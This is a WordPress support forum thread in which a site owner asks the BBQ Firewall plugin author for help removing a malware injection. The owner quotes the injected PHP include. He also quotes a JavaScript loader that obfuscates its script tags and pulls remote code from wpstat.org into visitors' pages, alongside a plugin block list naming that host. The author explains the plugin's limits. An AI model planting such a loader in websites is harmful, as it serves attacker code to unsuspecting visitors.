Title: Script (malware?) still loading
Last modified: August 24, 2016

---

# Script (malware?) still loading

 *  Resolved [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * (@marcsohier)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/script-malware-still-loading/)
 * Hi,
 * I am facing a malware injection since days. I succeed removing the code injection
   I found. The malware initially injected this code into some pages:
    <?php include(‘
   assets/images/social.png’); ?>
 * But I still see in Chrome Console a script loaded in my website. I did not find
   which file is calling it.
 *     ```
       <script type="text/javascript">
       var now = new Date().getTime();
       if (now%2 == 0) {
       if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.js"></scr'+'ipt>'); }
       }
       </script>
       ```
   
 * I have decided to use your plugin and to add the strings wpstat and wpstat.org
   in the blacklist.
 * $bbq_blacklist_request_uri_items = array(‘wpstat.org’);
    $bbq_blacklist_query_string_items
   = array(‘wpstat.org’); $bbq_blacklist_user_agent_items = array(‘wpstat.org’);
 * However, the script is still loaded in every page. I spent hours and hours trying
   to fix this but I failed.
 * If you have any lead or solution to solve this issue I woulb be really grateful.
 * Thanks again for your great plugin.
 * Marc
 * [http://www.angelinextension.com](http://www.angelinextension.com)
 * [https://wordpress.org/plugins/block-bad-queries/](https://wordpress.org/plugins/block-bad-queries/)

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Plugin Author [Jeff Starr](https://wordpress.org/support/users/specialk/)
 * (@specialk)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/script-malware-still-loading/#post-6018553)
 * It’s important to understand how BBQ works, which is by examining the requested
   URI and pattern-matching against specified strings.
 * Thus, BBQ doesn’t really have anything to do with the output/functionality of
   other scripts, such as the one that apparently is adding the malicious code to
   your site.
 * My advice would be to first find and fix the vulnerability, and then remove the
   malicious script and clean things up.
 *  Thread Starter [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * (@marcsohier)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/script-malware-still-loading/#post-6018775)
 * Thanks Jeff for your prompt reply. Understood better how your plugin works.
 * Marc

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Script (malware?) still loading’ is closed to new replies.

 * ![](https://ps.w.org/block-bad-queries/assets/icon-256x256.png?rev=1471770)
 * [BBQ Firewall - Fast & Powerful Firewall Security](https://wordpress.org/plugins/block-bad-queries/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/block-bad-queries/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/block-bad-queries/)
 * [Active Topics](https://wordpress.org/support/plugin/block-bad-queries/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/block-bad-queries/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/block-bad-queries/reviews/)

 * 2 replies
 * 2 participants
 * Last reply from: [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/script-malware-still-loading/#post-6018775)
 * Status: resolved